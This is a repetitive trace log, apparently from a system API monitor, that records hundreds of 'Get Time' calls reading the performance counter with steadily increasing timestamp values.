| System | Get Time | type = Performance Ctr, time = 23850536208 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23850551709 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23853641801 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23853651521 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23855196429 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23855209022 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23856770979 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23856783416 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23858327384 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23858340472 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23861453020 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23861465767 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23863049288 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23863060440 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23866143828 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23866155726 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23871884439 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23871897296 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23871918102 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23871925349 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23873969252 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23873982027 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23875519465 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23875529803 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23877075703 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23877087422 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23880196461 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23880209108 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23881778562 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23881790126 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23883325889 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23883338503 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23886444636 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23886455774 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23888020809 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23888159102 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23889643817 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23889656682 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23891296482 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23891310224 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23894271770 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23894284354 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23895842309 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23895853356 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23898953996 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23898966138 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23900521270 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23900533243 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23902087720 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23902100716 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23905209519 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23905222402 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23906790792 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23906802183 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23909950151 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23909964576 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23912979213 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23912997897 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23916082342 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23916094607 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23919207583 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23919220015 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23922347973 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23922360678 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23925442949 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23925455122 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23927612697 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23927625278 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23929185120 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23929197857 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23932334586 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23932347883 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23933874658 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23933887127 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23936993864 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23937004069 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23940123779 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23940136520 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23941676552 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23941689212 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23943241352 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23943255451 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23946366330 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23946381149 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23947939682 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23947954821 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23951059217 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23951073101 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23952619779 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23952634635 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23955734255 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23955747336 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23958868858 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23958884310 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23960458770 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23960472091 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23963556258 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23963569677 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23966689945 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23966703482 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23972027898 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23972043048 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23972070076 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23972078870 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23974482313 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23974495397 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23976053149 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23976065975 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23979181225 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23979194053 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23982329075 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23982343538 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23983869399 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23983884183 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23986984266 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23986998022 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23988555616 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23988568542 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23991769458 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23991782378 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23993262620 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23993276538 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23996359868 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23996372686 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23999492031 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23999506264 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24002608909 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24002622074 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24004198950 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24004212310 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24005740526 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24005754936 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24008859804 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24008872856 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24010429071 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24010441608 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24011991120 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24012004555 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24015129325 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24015141802 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24018242237 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24018256767 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24021360227 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24021373046 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24022935537 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24022949815 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24024491894 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24024504052 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24027612517 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24027625851 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24031233490 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24031247186 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24033870143 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24033883511 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24037003956 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24037016840 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24040108014 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24040120847 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24043234347 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24043246709 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24044806083 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24044820735 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24046359952 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24046372636 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24047961738 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24047977013 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24051056414 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24051069075 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24052612584 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24052625539 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24055734259 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24055746834 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24058886037 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24058900849 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24060429306 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24060442288 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24063562750 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24063577386 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24066676539 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24066689351 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24074501814 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24074514611 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24074535044 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24074542239 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24077604278 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24077615189 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24080734109 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24080745468 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24083859250 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24083871635 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24085437203 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24085450740 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24088555045 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24088567760 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24091680268 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24091693278 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24093229129 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24093241538 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24094939490 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24094952906 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24097926613 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24097939346 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24099484533 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24099497989 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24101059826 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24101072843 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24104185784 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24104198450 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24107303375 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24107316427 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24110426045 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24110438583 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24111987029 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24111998392 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24115106798 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24115119861 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24116677146 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24116688672 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24119801224 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24119814725 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24121360876 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24121374203 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24124494415 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24124503529 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24126055019 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24126068241 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24127610471 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24127623891 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24129180722 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24129194123 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24132320158 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24132333512 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24133857260 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24133866725 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24136991441 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24137005020 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24138553295 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24138566005 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24140114748 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24140129135 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24143231149 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24143239959 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24144812918 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24144826142 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24147926134 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24147938762 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24149500229 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24149515328 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24151059349 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24151072186 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24154188582 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24154201211 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24157305362 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24157318518 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24158855771 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24158868566 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24160444253 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24160459689 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24163554476 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24163567617 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24166680338 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24166693626 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24168235982 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24168250607 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24171807242 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24171820134 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24174487943 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24174500938 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24176049114 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24176060901 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24177619744 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24177630124 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24180757716 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24180771422 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24183858825 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24183871839 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24185441739 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24185457104 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24190105254 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24190118169 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24190138396 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24190145562 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24193233829 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24193247457 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24194829849 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24194844476 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24197921836 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24197934969 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24201051275 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24201064085 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24202606836 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24202619626 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24204185745 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24204199989 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24205734836 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24205749252 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24208856107 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24208868813 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24211983829 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24211993538 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24215108629 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24215121211 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24216677568 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24216689403 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24219818480 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24219831058 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24222925383 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24222936555 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24224484569 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24224497197 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24227603571 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24227614586 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24229179692 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24229192539 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24232320579 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24232333888 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24235442126 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24235455097 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24236996229 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24237009483 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24240118330 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24240129547 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24241718355 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24241733417 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24244812914 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24244828126 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24247627608 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24247642739 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24249493591 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24249508713 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24252640932 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24252655772 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24255743411 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24255756707 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24258869578 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24258884659 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24261993329 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24262009031 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24263795302 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24263814334 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24269455759 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24269472156 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24274706804 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24274721389 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24274756475 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24274767028 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24277622561 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24277638265 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24280744000 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24280759802 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24282321393 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24282336615 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24283881823 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24283891721 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24287010257 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24287026676 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24288819390 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24288834203 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24291693760 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24291708404 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24293246774 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24293264589 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24296417188 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24296433326 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24299485310 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24299498303 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24302606364 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24302617785 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24304187548 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24304201669 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24305740877 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24305755113 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24307333960 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24307346737 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24314246270 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24314261338 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24314287514 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24314296427 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24317117428 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24317131042 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24320287997 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24320301466 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24321801302 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24321815393 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24323362253 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24323375416 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24324916181 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24324929457 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24326490241 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24326504749 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24329639379 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24329654317 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24331684762 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24331700202 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24334345366 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24334360519 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24335861805 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24335875544 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24338985793 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24339000688 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24342112588 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24342126839 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24345230638 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24345244621 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24346804059 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24346818558 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24349924540 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24349934948 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24351492311 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24351502166 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24433761438 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24433774791 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24433802759 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24433810016 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24435887666 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24435900601 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24454570531 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24454583771 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24456167710 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24456180485 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24459292482 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24459300383 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24462412577 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24462425791 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24463984414 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24463997827 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24471129657 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24471143015 |
|
1 | |
